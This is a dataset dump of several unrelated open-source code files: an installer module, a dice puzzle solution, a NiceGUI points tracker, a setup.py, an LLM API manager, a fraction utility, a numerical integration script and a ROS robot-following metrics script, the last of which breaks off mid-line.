img.MakeImage(self.initrd_out, image['format'], \n image.get('zipped', False), \n image.get('zip_format', 'gzip'))\n self.image.open('r')\n self.image.read('.buildstamp', self.mddir)\n self.image.close()\n img.cleanup()\n\n def apply(self):\n # parse buildstamp\n buildstamp = ffile.DictToFormattedFile(self.locals.L_BUILDSTAMP_FORMAT)\n\n # update base vars\n assert_file_has_content(self.buildstamp_out)\n self.cvars.setdefault('base-info', {}).update(buildstamp.read(self.buildstamp_out))\n\n def verify_buildstamp_file(self):\n \"verify buildstamp file exists\"\n self.verifier.failUnlessExists(self.buildstamp_out)\n def verify_cvars(self):\n \"verify cvars exist\"\n self.verifier.failUnlessSet('base-info')\n","repo_name":"kaywilliams/rosie","sub_path":"deploy/modules/core/installer/base-info.py","file_name":"base-info.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9709622731","text":"L = list(map(int, input().split()))\r\n\r\nfor i in range(1, 10):\r\n if L.count(i) == 3:\r\n print(10000 + (i * 1000))\r\n break\r\n elif L.count(i) == 2:\r\n print(1000 + (i * 100))\r\n break\r\n\r\n\r\nif L[0] != L[1] and L[0] != L[2] and L[1] != L[2]:\r\n print(max(L) * 100)","repo_name":"skh990427/Baekjoon","sub_path":"백준/Bronze/2480. 주사위 세개/주사위 세개.py","file_name":"주사위 세개.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70651264693","text":"from nicegui import ui\nfrom tinydb import TinyDB, Query\nfrom datetime import timezone, timedelta, datetime\nimport os\n\n# 当前路径获取\ncurrent_path = os.path.abspath(__file__)\nfather_path = os.path.abspath(os.path.dirname(current_path) + os.path.sep + \".\")\n\n# TinyDB 数据库\ndbPath = os.path.join(father_path, \"db.json\")\ndb = TinyDB(dbPath)\nUser = Query()\nlogDbPath = os.path.join(father_path, \"logDb.json\")\nlogDb = TinyDB(logDbPath, ensure_ascii = False)\nruleDbPath = os.path.join(father_path, \"ruleDb.json\")\nruleDb = TinyDB(ruleDbPath, ensure_ascii = False)\n\n# 黑暗模式\ndark = ui.dark_mode()\ndef darkModeSwitch():\n if dark.value:\n dark.disable()\n else:\n dark.enable()\n\n# 首页\nui.markdown('''#婷婷公主与他的笨蛋骑士小魏''')\nwith ui.row():\n ui.button('快点我', on_click=lambda: ui.notify('别点我啦', close_button=\"饶过你\"))\n ui.switch('黑暗模式', on_change=darkModeSwitch) \n ui.spinner('dots', size='lg', color='blue')\n\n# 积分表\ngrid = ui.aggrid({\n 'defaultColDef': {'flex': 1},\n 'columnDefs': [\n {'headerName': '名字', 'field': 'name'},\n {'headerName': '分数', 'field': 'fen'},\n {'headerName': '愿望卷', 'field': 'ticket'},\n ],\n 'rowData': [\n {'name': '婷婷', 'fen': db.search(User.name == 'ztt')[0]['score'], 'ticket': db.search(User.name == 'ztt')[0]['ticket']},\n {'name': '小魏', 'fen': db.search(User.name == 'why')[0]['score'], 'ticket': db.search(User.name == 'why')[0]['ticket']},\n ],\n}).classes('max-h-24')\n\n# 积分日志\nbeijingTime = timezone(timedelta(hours=8))\ndef logZtt(score, ticket, event):\n zttPlus(score, ticket)\n datetimeNow = datetime.utcnow().astimezone(beijingTime)\n datetimeNowStr = datetimeNow.strftime(\"%Y/%m/%d-%H:%M:%S\")\n eventZtt = \", 婷婷公主 {0}, {1}\".format(event, score)\n logDb.insert({'time': datetimeNowStr, 'event': eventZtt})\n log.push(datetimeNowStr+eventZtt)\ndef logWhy(score, ticket, event):\n whyPlus(score, ticket)\n datetimeNow = datetime.utcnow().astimezone(beijingTime)\n datetimeNowStr = datetimeNow.strftime(\"%Y/%m/%d-%H:%M:%S\")\n eventWhy = \", 笨蛋小魏 {0}, {1}\".format(event, score)\n logDb.insert({'time': datetimeNowStr, 'event': eventWhy})\n log.push(datetimeNowStr+eventWhy)\n \n# 积分函数\ndef zttPlus(score, ticket):\n grid.options['rowData'][0]['fen'] += score\n db.update({'score': db.search(User.name == 'ztt')[0]['score'] + score}, User.name == 'ztt')\n grid.options['rowData'][0]['ticket'] += ticket\n db.update({'ticket': db.search(User.name == 'ztt')[0]['ticket'] + ticket}, User.name == 'ztt')\n grid.update()\ndef whyPlus(score, ticket):\n grid.options['rowData'][1]['fen'] += score\n db.update({'score': db.search(User.name == 'why')[0]['score'] + score}, User.name == 'why')\n grid.options['rowData'][1]['ticket'] += ticket\n db.update({'ticket': db.search(User.name == 'why')[0]['ticket'] + ticket}, User.name == 'why')\n grid.update()\n\nwith ui.row():\n ui.button('婷婷加1', on_click=lambda: logZtt(1, 0, \"加一\"))\n ui.button('婷婷减1', on_click=lambda: logZtt(-1, 0, \"减一\"))\n ui.button('小魏加1', on_click=lambda: logWhy(1, 0, \"加一\"))\n ui.button('小魏减1', on_click=lambda: logWhy(-1, 0, \"减一\"))\nwith ui.row():\n resultZtt = ui.number(label='婷婷加减自定义分数', value=5)\n ui.button('提交', on_click=lambda: logZtt(resultZtt.value, 0, \"自定义\"))\nwith ui.row():\n resultWhy = ui.number(label='小魏加减自定义分数', value=5)\n ui.button('提交', on_click=lambda: logWhy(resultWhy.value, 0, \"自定义\"))\nwith ui.grid(columns=5):\n ui.button('好好吃饭', on_click=lambda: logZtt(2, 0, \"好好吃饭\"))\n ui.button('早早睡觉', on_click=lambda: logZtt(2, 0, \"早早睡觉\"))\n ui.button('好好工作', on_click=lambda: logZtt(3, 0, \"好好工作\"))\n ui.button('陪小魏打游戏', on_click=lambda: logZtt(5, 0, \"陪小魏打游戏\"))\n ui.button('陪小魏睡觉觉', on_click=lambda: logZtt(10, 0, \"陪小魏睡觉觉\"))\nui.separator()\n\n# 万能愿望卷加减\nwith ui.row():\n ui.button('婷婷兑换万能愿望卷', on_click=lambda: logZtt(-20, 1, \"万能愿望卷\"))\n ui.button('小魏兑换万能愿望卷', on_click=lambda: logWhy(-20, 1, \"万能愿望卷\"))\nwith ui.row():\n ui.button('婷婷万能愿望卷加0.5', on_click=lambda: logZtt(0, 0.5, \"万能愿望卷加0.5\"))\n ui.button('婷婷万能愿望卷减0.5', on_click=lambda: logZtt(0, -0.5, \"万能愿望卷减0.5\"))\n ui.button('小魏万能愿望卷加0.5', on_click=lambda: logWhy(0, 0.5, \"万能愿望卷加0.5\"))\n ui.button('小魏万能愿望卷减0.5', on_click=lambda: logWhy(0, -0.5, \"万能愿望卷减0.5\"))\nwith ui.row():\n zttInput = ui.input(label='婷婷使用万能愿望卷', placeholder='使用原因',\n validation={'输入过长': lambda value: len(value) < 20})\n ui.button('提交', on_click=lambda: logZtt(0, -1, zttInput.value))\nwith ui.row():\n whyInput = ui.input(label='小魏使用万能愿望卷', placeholder='使用原因',\n validation={'输入过长': lambda value: len(value) < 20})\n ui.button('提交', on_click=lambda: logWhy(0, -1, whyInput.value))\nui.separator()\n\n# 积分规则 \n## 更新规则\ndef ruleUpdate(value, select):\n ruleDb.update({'rule': value}, User.name == select)\n ruleMark.refresh()\ndef ruleTextUpdate():\n ruleText.value = ruleDb.search(User.name == ruleSelect.value)[0]['rule']\nwith ui.dialog() as ruleDialog, ui.card().classes('w-80 h-72'):\n with ui.column():\n with ui.row():\n ruleSelect = ui.select(['婷婷公主', '笨蛋小魏', '万能愿望卷'], value='婷婷公主', on_change=lambda: ruleTextUpdate())\n ui.button('保存', on_click=lambda: ruleUpdate(ruleText.value, ruleSelect.value))\n ui.button('关闭', on_click=ruleDialog.close)\n ruleText = ui.textarea(label='积分规则修改', value=ruleDb.search(User.name == ruleSelect.value)[0]['rule']).classes('w-64 h-48')\nwith ui.row():\n ui.label('积分规则').classes('text-h5')\n ui.button('规则修改', on_click=ruleDialog.open)\n## 显示规则\n@ui.refreshable\ndef ruleMark(name):\n ui.markdown(ruleDb.search(User.name == name)[0]['rule'])\nwith ui.row():\n with ui.card().classes('w-96 h-32'):\n with ui.scroll_area():\n ruleMark('婷婷公主')\n with ui.card().classes('w-96 h-32'):\n with ui.scroll_area():\n ruleMark('笨蛋小魏')\n with ui.card().classes('w-96 h-32'):\n with ui.scroll_area():\n ruleMark('万能愿望卷')\nui.separator()\n\n# 积分日志\nwith ui.dialog() as dialog, ui.card().classes('w-96 h-96'):\n logAll = ui.log().classes('w-full h-80')\n for item in logDb:\n # 显示全部日志\n logAll.push(item['time'][2:-1]+item['event'])\n ui.button('关闭', on_click=dialog.close)\nwith ui.row():\n ui.label('积分日志').classes('text-h5')\n ui.button('查看全部日志', on_click=dialog.open)\nlog = ui.log().classes('w-full h-20')\nui.separator()\n\n# 商城\nui.label('商城').classes('text-h5')\n# 树脂4\ndef shopping4():\n if grid4.options['rowData'][0]['num'] == 0:\n goods4Dialog.close()\n ui.notify(\"卖完啦,亲一口小魏补货\")\n return 0\n logZtt(-4, 0, \"购买树脂4\")\n db.update({'num': db.search(User.name == '4')[0]['num'] - 1}, User.name == '4')\n grid4.options['rowData'][0]['num'] -= 1\n goods4Dialog.close()\n grid4.update()\nwith ui.dialog() as goods4Dialog, ui.card():\n ui.label('是否确定购买?')\n with ui.row():\n ui.button('否', on_click=goods4Dialog.close)\n ui.button('是', on_click=shopping4)\nwith ui.splitter().classes('w-full h-full') as splitter:\n with splitter.before:\n with ui.card().classes('w-full h-full'):\n ui.image('https://s2.loli.net/2023/09/19/PgdEmzL4plAwJjy.jpg')\n with splitter.after:\n with ui.card().classes('w-full h-full'):\n grid4 = ui.aggrid({\n 'defaultColDef': {'flex': 1},\n 'columnDefs': [\n {'headerName': '单价', 'field': 'score'},\n {'headerName': '数量', 'field': 'num'},\n ],\n 'rowData': [\n {'score': db.search(User.name == '4')[0]['score'], 'num': db.search(User.name == '4')[0]['num']},\n ],\n }).classes('w-full h-16')\n ui.button('购买', on_click=goods4Dialog.open).classes('w-full')\nui.separator()\n\n# 树脂5\ndef shopping5():\n if grid5.options['rowData'][0]['num'] == 0:\n goods5Dialog.close()\n ui.notify(\"卖完啦,亲一口小魏补货\")\n return 0\n logZtt(-5, 0, \"购买树脂5\")\n db.update({'num': db.search(User.name == '5')[0]['num'] - 1}, User.name == '5')\n grid5.options['rowData'][0]['num'] -= 1\n goods5Dialog.close()\n grid5.update()\nwith ui.dialog() as goods5Dialog, ui.card():\n ui.label('是否确定购买?')\n with ui.row():\n ui.button('否', on_click=goods5Dialog.close)\n ui.button('是', on_click=shopping5)\nwith ui.splitter().classes('w-full h-full') as splitter:\n with splitter.before:\n with ui.card().classes('w-full h-full'):\n ui.image('https://s2.loli.net/2023/09/19/6ADRVUtHJ1C9f2S.jpg')\n with splitter.after:\n with ui.card().classes('w-full h-full'):\n grid5 = ui.aggrid({\n 'defaultColDef': {'flex': 1},\n 'columnDefs': [\n {'headerName': '单价', 'field': 'score'},\n {'headerName': '数量', 'field': 'num'},\n ],\n 'rowData': [\n {'score': db.search(User.name == '5')[0]['score'], 'num': db.search(User.name == '5')[0]['num']},\n ],\n }).classes('w-full h-16')\n ui.button('购买', on_click=goods5Dialog.open).classes('w-full')\nui.separator()\n\nui.run(title='ZTT LOVE WHY', favicon='💖')","repo_name":"StudentWeis/jifen","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20595619469","text":"import setuptools\n\nwith open('README.md', 'r') as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"fourparts\",\n version=\"0.0.1\",\n author=\"rxtan\",\n description=\"A package related to all things 4 parts\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/ruixuantan/fourparts\",\n packages=setuptools.find_packages(),\n install_requires=[\n 'pandas',\n 'py-midicsv',\n 'scikit-learn'\n ],\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.8.0'\n)\n","repo_name":"ruixuantan/FourParts","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27883822082","text":"from memoflow.core import dependency\r\nfrom memoflow.core import manager\r\nfrom memoflow.conf import CONF\r\n\r\nfrom typing import (\r\n Any,\r\n Callable,\r\n Dict,\r\n Iterable,\r\n List,\r\n Optional,\r\n Tuple,\r\n Type,\r\n)\r\n\r\n\r\n@dependency.provider('llm_api')\r\nclass LLMAPIManager(manager.Manager):\r\n driver_namespace = \"memoflow.driver.driver_manager\"\r\n\r\n def __init__(self):\r\n super(LLMAPIManager,\r\n self).__init__(driver_name=CONF.driver_manager.LLM_API_DRIVER)\r\n\r\n def get_embedding(self, text):\r\n return self.driver.get_embedding(text)\r\n\r\n def get_embedding_function(self):\r\n return self.driver.get_embedding_function()\r\n ","repo_name":"qyzhizi/web_dl","sub_path":"memoflow/driver_manager/llm.py","file_name":"llm.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"36093661817","text":"def convertFracts(lst):\n fengmu = []\n sarr = []\n result = []\n for i in lst:\n fengmu.append(i[1])\n\n def gcd(a, b):\n if b == 0:\n return a\n\n return gcd(b, a % b)\n\n def lcm(c, d):\n return c * d / (gcd(c, d))\n\n sarr.append(lcm(fengmu[0], fengmu[1]))\n count = 0\n for i in fengmu[2:]:\n s = lcm(sarr[count], i)\n sarr.append(s)\n count += 1\n LCM = sarr[-1]\n\n def zoomUp(e, f, LCM):\n return [int(LCM / f * e), int(LCM)]\n\n for i in lst:\n result.append(zoomUp(i[0], i[1], LCM))\n return result\n\n\n77033412951888085, 14949283383840498\n'''\nfrom fractions import gcd\n\ndef get_lcm(lst):\n return reduce(lambda x, y : x*y/gcd(x,y), lst)\n\ndef convertFracts(lst):\n lcm = get_lcm([ y for x, y in lst])\n return [ [x*lcm/y, lcm] for x, y in lst]\n \ndef gcd(a,b):\n while b:\n a,b=b,a%b\n return a\ndef lcm(a,b):\n return a*b/gcd(a,b)\n'''\n\n","repo_name":"ecafkoob/Python","sub_path":"CommonDenominators.py","file_name":"CommonDenominators.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24905943745","text":"import math\nimport numpy\nfrom scipy import integrate\nf=open('1dstar.txt',\"r\")\n\ndef Remove(duplicate): \n\tfinal_list = [[], []] \n\tfor i in range(len(duplicate[0])): \n\t\tif duplicate[0][i] not in final_list[0]: \n\t\t\tfinal_list[0].append(duplicate[0][i])\n\t\t\tfinal_list[1].append(duplicate[1][i])\n\treturn final_list \ndef bubbleSort(arr):\n\tn = len(arr[0])\n \n # Traverse through all array elements\n\tfor i in range(n):\n \n # Last i elements are already in place\n\t\tfor j in range(0, n-i-1):\n \n # traverse the array from 0 to n-i-1\n # Swap if the element found is greater\n # than the next element\n\t\t\tif arr[0][j] > arr[0][j+1] :\n\t\t\t\tarr[0][j], arr[0][j+1] = arr[0][j+1], arr[0][j]\n\t\t\t\tarr[1][j], arr[1][j+1] = arr[1][j+1], arr[1][j]\ndef badVolIntegrate(arr):\n\tn = len(arr[0])\n\tresult = 0\n\tprevious_radius= arr[0][0]\n\tprevious_rho=arr[1][0]\n\tfor i in range(1, n):\n\t\tresult += previous_rho * ((4.0/3)*math.pi)*(arr[0][i]**3 - previous_radius**3)\n\t\tprevious_radius = arr[0][i]\n\t\tprevious_rho = arr[1][i]\n\tprint('Mass: ' + str(result))\ndef goodVolIntegrate(arr):\t\n\tn = len(arr[0])\n\tresult = 0\n\tareadens=[]\n\tfor i in range(0,len(arr[1])):\n\t\tareadens.append(arr[1][i]*4*math.pi*arr[0][i]**2)\n\tresult=integrate.simps(areadens,arr[0])\n\tprint('Mass: ' + str(result))\nlines=f.readlines()\nresult= [[], []]\nfor x in lines:\n\tresult[0].append(x.split(' ')[1])\n\tresult[1].append(x.split(' ')[2])\ndata = [[], []]\nfor x in range(len(result[0])):\n\tif float(result[0][x]) >= 0:# and float(result[0][x]) <=.87: #and float(result[0][x]) <=1.5:\n\t\tdata[0].append(float(result[0][x]))\n\t\tdata[1].append(float(result[1][x]))\n#print(len(data[0]))\n#print(len(data[1]))\ndata = Remove(data)\n#print(len(data[0]))\n#print(len(data[1]))\nbubbleSort(data)\n#print(len(data[0]))\n#print(data[0])\n#print(\"\\n\")\n#print(data[1])\n#for i in range(len(data[1])):\n#\tif numpy.isclose(data[1][i],0.0007862454):\n#\t\tprint(data[0][i])\ngoodVolIntegrate(data)\n\nf.close()\n","repo_name":"Illinois-Relativity-Group/abid_bot","sub_path":"abid_bot_v2.8/bin/Massinator/test/h5_script_v1.py","file_name":"h5_script_v1.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13304186254","text":"#!/usr/bin/env python\nimport argparse\nimport copy\nimport traceback\n\nfrom os import listdir\nfrom os.path import isfile, join\n\n#from cv_bridge import CvBridge\n\n\nimport math\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport random\n# u\nimport numpy as np\nimport cv2 as cv\n\nimport rospy\n# Brings in the SimpleActionClient\nimport actionlib\n# Brings in the .action file and messages used by the move base action\nfrom move_base_msgs.msg import MoveBaseAction, MoveBaseGoal\n\n\nfrom squaternion import quat2euler\nfrom squaternion import euler2quat\n\nfrom sensor_msgs.msg import Image\nfrom geometry_msgs.msg import Point\nfrom geometry_msgs.msg import Point32\nfrom geometry_msgs.msg import TransformStamped\nfrom rosgraph_msgs.msg import Clock\n\nfrom costmap_converter.msg import ObstacleArrayMsg\nfrom costmap_converter.msg import ObstacleMsg\nfrom geometry_msgs.msg import Twist\n\n\nimport threading\n\n\nimport _thread\n\nfrom squaternion import quat2euler\nfrom squaternion import euler2quat\n\nfrom simple_pid import PID\n\nimport pickle\nimport utils\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass Robot():\n def __init__(self, name):\n self.name = name\n self.prev_call_vicon = None\n self.state_ = {\"position\":(None, None), \\\n \"orientation\":None}\n self.all_states_ = []\n self.last_time_observation = None\n if self.name == \"robot\":\n rospy.Subscriber(\"/vicon/Robot/Robot\", TransformStamped, self.vicon_cb)\n elif self.name == \"person\":\n rospy.Subscriber(\"/vicon/Person/Person\", TransformStamped, self.vicon_cb)\n\n def get_pos(self, idx):\n if \"position\" in self.all_states_[idx].keys():\n pos = self.all_states_[idx][\"position\"]\n else:\n pos = self.all_states_[idx][\"pos\"]\n return pos\n\n def get_orientation(self, idx):\n return self.all_states_[idx][\"orientation\"]\n\n\n def vicon_cb(self, pose_msg):\n if self.last_time_observation is not None and abs(rospy.Time.now().to_sec() - self.last_time_observation) <0.025:\n return\n pos = pose_msg.transform.translation\n self.last_time_observation = rospy.Time.now().to_sec()\n self.state_[\"position\"] = (pos.x, pos.y)\n euler = quat2euler(pose_msg.transform.rotation.x, pose_msg.transform.rotation.y, pose_msg.transform.rotation.z, pose_msg.transform.rotation.w)\n self.state_[\"orientation\"] = euler[0]\n self.all_states_.append(self.state_.copy())\n\n def get_relative_position(self, center, idx):\n relative_orientation = self.all_states_[idx]['orientation']\n center_pos = np.asarray(center.get_pos(idx))\n center_orientation = center.all_states_[idx]['orientation']\n\n # transform the pos to center coordinat\n relative_pos = np.asarray(self.get_pos(idx) - center_pos)\n rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])\n relative_pos = np.matmul(relative_pos, rotation_matrix)\n\n return relative_pos\n\n def get_relative_heading_position(self, center, idx):\n relative_orientation = self.all_states_[idx]['orientation']\n center_pos = np.asarray(center.get_pos(idx))\n center_orientation = center.all_states_[idx]['orientation']\n print (np.rad2deg(relative_orientation - center_orientation))\n\n # transform the relative to center coordinat\n relative_pos = np.asarray(self.get_pos(idx) - center_pos)\n relative_pos2 = np.asarray((relative_pos[0] +math.cos(relative_orientation) , relative_pos[1] + math.sin(relative_orientation)))\n rotation_matrix = np.asarray([[np.cos(-center_orientation), np.sin(-center_orientation)], [-np.sin(-center_orientation), np.cos(-center_orientation)]])\n relative_pos = np.matmul(relative_pos, rotation_matrix)\n relative_pos2 = np.matmul(relative_pos2, rotation_matrix)\n angle_relative = np.arctan2(relative_pos2[1]-relative_pos[1], relative_pos2[0]-relative_pos[0])\n return angle_relative, relative_pos\n\n def is_bag_finish(self):\n if self.last_time_observation is not None and abs(rospy.Time.now().to_sec() - self.last_time_observation) > 1:\n return True\n return False\n\nclass Results():\n def __init__(self):\n self.center_pos_ = (0, 0)\n self.name = \"\"\n self.DESIRE_DISTANCE = 1.5\n self.colors_visualization = cv.cvtColor(cv.applyColorMap(np.arange(0, 255, dtype=np.uint8), cv.COLORMAP_WINTER), cv.COLOR_RGB2BGR).reshape(255,3).tolist()\n self.current_obsevation_image_ = np.zeros([500,500,3])\n self.current_obsevation_image_.fill(255)\n\n self.color_index = 0\n self.first_call_observation = True\n self.robot = Robot(\"robot\")\n self.person = Robot(\"person\")\n\n def add_line_observation_to_image(self, pos, pos2):\n color = self.colors_visualization[self.color_index]\n pos_image = utils.to_image_coordinate(pos, self.center_pos_)\n pos_image2 = utils.to_image_coordinate(pos2, self.center_pos_)\n if pos_image[0] >self.current_obsevation_image_.shape[0] or pos_image[0] < 0 or pos_image[1] >self.current_obsevation_image_.shape[1] or pos_image[1] < 0:\n rospy.logerr(\"problem with observation: {}\".format(pos_image))\n return\n self.new_obsevation_image_ = cv.line(self.new_obsevation_image_, (pos_image[0], pos_image[1]), (pos_image2[0], pos_image2[1]), color, 1)\n\n def add_triangle_observation_to_image(self, pos, orientation):\n color = self.colors_visualization[self.color_index]\n pos_image = utils.to_image_coordinate(pos, self.center_pos_)\n pos_triangle1 = utils.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)\n pos_triangle2 = utils.to_image_coordinate((pos[0]+math.cos(orientation+math.pi/2)*0.1, pos[1]+math.sin(orientation+math.pi/2)*0.1), self.center_pos_)\n pos_triangle3 = utils.to_image_coordinate((pos[0]+math.cos(orientation-math.pi/2)*0.1, pos[1]+math.sin(orientation-math.pi/2)*0.1), self.center_pos_)\n poses = [pos_triangle1, pos_triangle2, pos_triangle3]\n\n for pos in poses:\n if pos[0] >self.current_obsevation_image_.shape[0] or pos[0] < 0 or pos[1] >self.current_obsevation_image_.shape[1] or pos[1] < 0:\n rospy.logerr(\"problem with observation: {}\".format(pos))\n return\n self.new_obsevation_image_ = cv.drawContours(self.new_obsevation_image_, [np.asarray(poses)], 0, color, -1)\n\n\n def add_arrow_observation_to_image(self, pos, orientation):\n color = self.colors_visualization[self.color_index]\n pos_image = utils.to_image_coordinate(pos, self.center_pos_)\n pos_image2 = utils.to_image_coordinate((pos[0]+math.cos(orientation)*0.3, pos[1]+math.sin(orientation)*0.3), self.center_pos_)\n if pos_image[0] >self.current_obsevation_image_.shape[0] or pos_image[0] < 0 or pos_image[1] >self.current_obsevation_image_.shape[1] or pos_image[1] < 0:\n rospy.logerr(\"problem with observation: {}\".format(pos_image))\n return\n self.new_obsevation_image_ = cv.arrowedLine(self.new_obsevation_image_, (pos_image[0], pos_image[1]), (pos_image2[0], pos_image2[1]), color, 2, tipLength=0.5)\n\n def add_circle_observation_to_image(self, pos, center_pos=None, image=None):\n color = self.colors_visualization[self.color_index]\n if image is None:\n image = self.new_obsevation_image_\n if center_pos is None:\n center_pos = self.center_pos_\n pos_image = utils.to_image_coordinate(pos, center_pos)\n if pos_image[0] >self.current_obsevation_image_.shape[0] or pos_image[0] < 0 or pos_image[1] >self.current_obsevation_image_.shape[1] or pos_image[1] < 0:\n rospy.logerr(\"problem with observation: {}\".format(pos_image))\n return\n return (cv.circle(image , (pos_image[0], pos_image[1]), 4, color, 2))\n\n\n\n def update_observation_image(self, idx, len_data):\n self.new_obsevation_image_ = np.copy(self.current_obsevation_image_)\n robot_pos = self.robot.get_pos(idx)\n robot_orientation = self.robot.get_orientation(idx)\n person_pos = self.person.get_pos(idx)\n person_orientation = self.person.get_orientation(idx)\n if person_orientation is None or robot_orientation is None:\n rospy.logerr(\"person or robot orientation is None\")\n return\n if self.first_call_observation:\n self.first_call_observation = False\n self.center_pos = person_pos\n #self.add_circle_observation_to_image(robot_pos)\n self.add_arrow_observation_to_image(robot_pos, robot_orientation)\n self.add_triangle_observation_to_image(person_pos, person_orientation)\n\n # self.add_line_observation_to_image(robot_pos, person_pos)\n alpha = 0.50\n self.current_obsevation_image_ = cv.addWeighted(self.new_obsevation_image_, alpha, self.current_obsevation_image_, 1 - alpha, 0)\n self.color_index += 255//len_data\n\n\n def get_current_observation_image(self):\n\n image = self.current_obsevation_image_.astype(np.uint8)\n #image = image/255.\n\n return image\n\n\n def get_angle_person_robot(self, idx):\n pos_rel = self.robot.get_relative_position(self.person, idx)\n angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])\n return (utils.wrap_pi_to_pi(angle_robot_person))\n\n def get_dist_person_robot(self, idx):\n pos_rel = self.robot.get_relative_position(self.person, idx)\n return math.hypot(pos_rel[0], pos_rel[1])\n\n def get_reward(self, idx):\n reward = 0\n pos_rel = self.robot.get_relative_position(self.person, idx)\n angle_robot_person = math.atan2(pos_rel[1], pos_rel[0])\n angle_robot_person = np.rad2deg(utils.wrap_pi_to_pi(angle_robot_person))\n distance = math.hypot(pos_rel[0], pos_rel[1])\n # Negative reward for being behind the person\n if distance<0.4:\n reward -= 1\n if distance < 0.5:\n reward = -1.3\n elif abs(distance - self.DESIRE_DISTANCE) < 0.5:\n reward += 0.5 * (0.5 - abs(distance - self.DESIRE_DISTANCE))\n elif distance >= self.DESIRE_DISTANCE + 0.5:\n reward -= 0.25 * (distance - self.DESIRE_DISTANCE + 0.5)\n elif distance < self.DESIRE_DISTANCE - 0.5:\n reward -= (self.DESIRE_DISTANCE - 0.5 - distance)/(self.DESIRE_DISTANCE - 0.5)\n if abs(angle_robot_person) < 25:\n reward += 0.5 * (25 - abs(angle_robot_person)) / 25\n else:\n reward -= 0.25 * abs(angle_robot_person) / 180\n if abs(distance - self.DESIRE_DISTANCE) < 0.5 and abs(angle_robot_person) < 25:\n reward += 0.25\n\n reward = min(max(reward, -1), 1)\n return reward\n\n def save(self, name):\n dic_data = {\"name\":name,\"robot\":self.robot.all_states_, \"person\":self.person.all_states_}\n with open (name+\"_.pkl\", \"wb\") as f:\n pickle.dump(dic_data, f)\n\n def load(self, file_address, use_sim=False):\n with open(file_address, \"rb\") as f:\n dic_data = pickle.load(f)\n\n self.name = dic_data[\"name\"]\n self.person.all_states_ = dic_data[\"person\"][4:].copy()\n self.robot.all_states_ = dic_data[\"robot\"][4:].copy()\n if use_sim:\n self.person.all_states_ = [ self.person.all_states_[idx*10] for idx in range (len(self.person.all_states_)//10)]\n self.robot.all_states_ = [ self.robot.all_states_[idx*10] for idx in range (len(self.robot.all_states_)//10)]\n\n def wait_until_bag_finish(self):\n while not self.robot.is_bag_finish() or not self.person.is_bag_finish():\n rospy.sleep(0.1)\n rospy.loginfo(\"waiting for bag to finish\")\n if len(self.person.all_states_)>0 and len(self.robot.all_states_)>0:\n print(self.robot.get_relative_position(self.person, -1))\n print(np.rad2deg(self.get_angle_person_robot(-1)))\n print (self.robot.all_states_)\n print (self.person.all_states_)\n\n def calculate_orientation_dif(self, idx):\n ori_rel, pos_rel = self.robot.get_relative_heading_position(self.person, idx)\n return ori_rel\n\n def get_metrics(self):\n rewards = []\n orientations = []\n orientation_dif = []\n distances = []\n len_data = min(len(self.robot.all_states_), len(self.person.all_states_))\n for idx in range (len_data):\n # if idx % 10==0:\n # self.update_observation_image(idx)\n rewards.append(self.get_reward(idx))\n distances.append(self.get_dist_person_robot(idx))\n orientations.append(self.get_angle_person_robot(idx))\n orientation_dif.append(self.calculate_orientation_dif(idx))\n\n mean_orientation = np.mean(orientations)\n sum_orientations_m = 0\n for orientation in orientations:\n sum_orientations_m += np.power(utils.wrap_pi_to_pi(mean_orientation - orientation),2)\n sum_orientations_m /= len(orientations)\n std = np.sqrt(sum_orientations_m)\n\n\n return {\"name\":self.name, \"orientation_mean\":np.average(orientations), \"orientation_std\":std, \\\n \"reward\":np.sum(rewards), \"distance\":np.average(distances), \"distance_std\":np.std(distances),\\\n \"ori_dif\":np.average(orientation_dif)}\n\n\n def plot_calculate_metrics(self):\n rewards = []\n orientations = []\n distances = []\n len_data = min(len(self.robot.all_states_), len(self.person.all_states_))\n for idx in range (len_data):\n if idx % 3==0:\n self.update_observation_image(idx, len_data//3)\n rewards.append(self.get_reward(idx))\n distances.append(self.get_dist_person_robot(idx))\n orientations.append(self.get_angle_person_robot(idx))\n print (np.rad2deg(self.robot.get_relative_heading_position(self.person, 0)[0]))\n\n img = self.get_current_observation_image()\n img = cv.cvtColor(img, cv.COLOR_RGB2BGR)\n print(f\"\\n\\ndist avg: {np.average(distances)} orientation avg: {np.rad2deg(np.average(orientations))}, reward: {np.sum(rewards)} reward avg: {np.average(rewards)}\")\n cv.imshow(\"image\", img)\n cv.waitKey(0)\n\n\n\ndef plot_all_results( results, is_sim=False):\n\n name = []\n orientations = []\n rewards = []\n distances = []\n orientations_std = []\n distances_std = []\n for result in results:\n met = result.get_metrics()\n name.append(met[\"name\"])\n rewards.append(met[\"reward\"])\n distances.append(met[\"distance\"])\n distances_std.append(met[\"distance_std\"])\n orientations.append(np.rad2deg(met[\"orientation_mean\"]))\n orientations_std.append(np.rad2deg(met[\"orientation_std\"]))\n print 